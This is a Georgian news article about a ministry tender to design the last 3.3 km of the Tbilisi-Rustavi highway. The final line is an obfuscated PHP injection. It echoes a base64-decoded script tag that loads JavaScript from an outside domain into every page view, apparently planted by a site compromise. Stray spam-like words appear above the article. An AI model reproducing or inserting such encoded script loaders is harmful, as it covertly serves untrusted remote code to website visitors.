celsiusi
ავერსი შნაიდერი

 რეგიონული განვითარებისა და ინფრასტრუქტურის სამინისტროს მუნიციპალური განვითარების ფონდმა თბილისი-რუსთვის საავტომობილო გზის 3.3 კმ-იანი მონაკვეთის მშენებლობის პროექტირებაზე ტენდერი გამოაცხადა - ამის შესახებ ინფორმაციას რეგიონული განვითარებისა და ინფრასტრუქტურის სამინისტრო ავრცელებს.

როგორც განცხადებაშია აღნიშნული, პროექტი სახელმწიფო ბიუჯეტის დაფინანსებით ხორციელდება.

„თბილისი-რუსთავის 17 კმ-იანი საავტომობილო გზის დასრულებული 13.5 კმ-იანი მონაკვეთით ავტოტრანსპორტი 2018 წლიდან სარგებლობს. მოცემულ ეტაპზე, ტენდერი გამოცხადდა დარჩენილი 3.3 კმ-იანი გზის პროექტირებაზე.

ტენდერში გამარჯვებულმა კომპანიამ ანალიზისა და მულტიფუნქციური შედარების საფუძველზე უნდა მოამზადოს ცემენტო ბეტონის საფარიანი, 4 ზოლიანი, განათების თანამედროვე სისტემით, კომუნიკაციებით, საგზაო უსაფრთხოების ყველა საჭირო ელემენტით აღჭურვილ საავტომობილო გზის დეტალური პროექტი, შესაბამისი გარემოსდაცვითი დოკუმენტაციით.

თბილისი-რუსთავის საავტომობილო გზის 3 კმ-იანი მონაკვეთი გადის ფონიჭალის დასახლებასთან, სადაც ავტოტრანსპორტის მოძრაობის ინტენსივობა მაღალია და პიკის საათებში რთულდება საერთაშორისო მნიშვნელობის გზის გამართულად ფუნქციონირება.

ამასთან, მნიშვნელოვანია თბილისი-რუსთავის მაგისტრალური გზის უკვე ექსპლუატაციაში არსებული მონაკვეთების ერთმანეთთან დაკავშირება, რაც უზრუნველყოფს უსაფრთხო და კომფორტულ გადაადგილებას.

პროექტი სახელმწიფო ბიუჯეტის დაფინანსებით ხორციელდება“ - ნათქვამია სამინისტროს ინფორმაციაში.

ტენდერის შესახებ დეტალური ინფორმაცია შეგიძლიათ იხილოთ შემდეგ ბმულზე:

http://mdf.org.ge/?site-lang=ka&site-path=tenders/current_tenders/&id=5572

170
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");